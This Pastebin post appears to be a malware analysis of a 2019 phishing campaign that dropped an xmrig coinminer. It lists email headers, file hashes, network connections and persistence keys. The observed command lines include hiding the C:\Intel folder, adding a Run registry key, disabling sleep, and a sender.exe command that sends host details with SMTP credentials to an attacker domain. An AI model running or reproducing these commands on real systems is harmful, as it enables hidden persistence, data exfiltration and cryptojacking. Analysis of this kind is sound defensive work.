Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #xmrig #bmcon #coinminer #SCR #UPX
- https://pastebin.com/LjHZHhc4
- previous_contact:
- https://pastebin.com/eTPuCkhC
- FAQ:
- https://github.com/xmrig/xmrig
- attack_vector
- --------------
- email attach .RAR > .SCR > C:\Intel\*.exe
- email_headers
- --------------
- Received: from s02.spamexperts.axc.nl (s02.spamexperts.axc.nl [185.182.56.112])
- Received: from vserver384.axc.nl ([185.182.56.51])
- Received: from [185.155.99.35] (helo=46-211-54-11.mobile.kyivstar.net)
- From: Бухгалтерія <mail@fin-director.nl>
- Subject: Доброго дня
- To: "user00" <user00@victim1.com>
- Date: Mon, 2 Sep 2019 05:14:31 +0300
- X-Originating-IP: 185.182.56.51
- X-SpamExperts-Domain: vserver384.axc.nl
- files
- --------------
- SHA-256 021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9
- File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.rar [RAR archive data, v34]
- File size 983.41 KB (1007012 bytes)
- SHA-256 067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b
- File name 1C - плaтiжнe дopучeння №47620205757176 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 1.02 MB (1066275 bytes)
- SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
- File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows, UPX compressed]
- File size 354.5 KB (363008 bytes)
- SHA-256 d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94
- File name bmcon.exe [PE32 executable (console) Intel 80386, for MS Windows]
- File size 1.31 MB (1370624 bytes)
- activity
- **************
- netwrk
- --------------
- [ssl]
- 88.99.38.225 dl.browsermine.com Client Hello
- [http]
- 13.107.4.50 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?698df6719eccbc04 HTTP/1.1 Microsoft-CryptoAPI/6.1
- 77.120.60.192 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
- 77.120.60.187 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgOEzWC36QVDJo6DaBgPQDAh%2Bw%3D%3D HTTP/1.1 Microsoft-CryptoAPI/6.1
- 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b835bcf15aa1abf HTTP/1.1 Microsoft-CryptoAPI/6.1
- 77.120.60.201 crl.microsoft.com GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1 Microsoft-CryptoAPI/6.1
- comp
- --------------
- bmcon.exe 2308 TCP localhost 49248 88.99.38.225 443 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49249 13.107.4.50 80 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49250 77.120.60.192 80 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49251 77.120.60.187 80 ESTABLISHED
- bmcon.exe 2308 TCP localhost 49252 88.99.38.225 443 ESTABLISHED
- bm-xmrig.exe 2696 TCP localhost 49253 159.69.189.115 4444 ESTABLISHED
- proc
- --------------
- "C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
- "C:\Users\operator\Desktop\1C - плaтiжнe дopучeння №47620205757176 - 2019.scr" /S
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\Intel\enable.cmd" "
- C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "╨Ш╨╜╤В╨╡╨│╤А╨╕╤А╨╛╨▓╨░╨╜╨╜╤Л╨╡_╨┤╤А╨░╨╣╨▓╨╡╤А╨░" /f
- C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe powercfg -h off
- C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
- C:\Windows\SysWOW64\attrib.exe C:\Windows\SysWOW64\attrib.exe
- C:\Windows\SysWOW64\cmd.exe /c ver
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
- C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC CPU Get Name /Value
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
- C:\Windows\SysWOW64\Wbem\WMIC.exe WMIC /Node:localhost Path Win32_VideoController Get Name /Value
- C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar sender.exe C:\ntel\sender.exe /y
- C:\Intel\sender.exe -to recipient@office-center.site -f "Robot4<sender2@office-center.site>" -server smtp.office-center.site -port 587 -u sender2@office-center.site -pw epsiloneridana -subject "host1/user1" -body "OS-WindowsX x64/CPU-Intel(R) CPU @ 2.20GHz/Cores-2/GPU-VGA"
- C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\privat.exe" /f
- C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\sender.rar privat.exe C:\ntel\privat.exe /y
- C:\Windows\SysWOW64\PING.EXE ping -n 3600 127.0.0.1
- "C:\Intel\driver.exe" e -hplimpid2903392 C:\Intel\sender.rar bmcon.exe C:\ntel\bmcon.exe /y
- "C:\Intel\bmcon.exe"
- "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
- "C:\Intel\bmcon\bm-xmrig.exe"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 02.09.2019 13:29
- 1) BMCon
- c:\intel\bmcon.exe 03.11.2018 3:42
- 2) private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
- c:\intel\privat.exe 20.06.1992 1:22
- drop
- --------------
- C:\Intel\bmcon.exe
- C:\Intel\bmcon.json
- C:\Intel\driver.exe
- C:\Intel\privat.exe
- C:\Intel\sender.exe
- C:\Intel\sender.rar
- ...
- C:\Intel\bmcon\apps.json
- C:\Intel\bmcon\bmstart.exe
- C:\Intel\bmcon\bm-xmrig.exe
- C:\Intel\bmcon\bm-xmrig.json
- # # #
- https://www.virustotal.com/gui/file/021db462fbc53a63aa08361ac18e5854ef70ba14151d108f74672540d3c880e9/details
- https://www.virustotal.com/gui/file/067f96ee758cc572a281bc7608e6619a50f43bf94f66245578967dadf414ca8b/details
- https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
- https://www.virustotal.com/gui/file/d782ffbccbae28228a49fbf86e5c62966f7f9f507c9054fee462c2d53f84cd94/details
- https://analyze.intezer.com/#/analyses/8b188ab9-9120-46ae-80b9-a811dd9d73e2
- https://analyze.intezer.com/#/analyses/2b2add43-448a-4c8e-984c-b49c805873a3
- https://analyze.intezer.com/#/analyses/cba2a28c-10df-491c-b5f9-7e974cde1df0
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement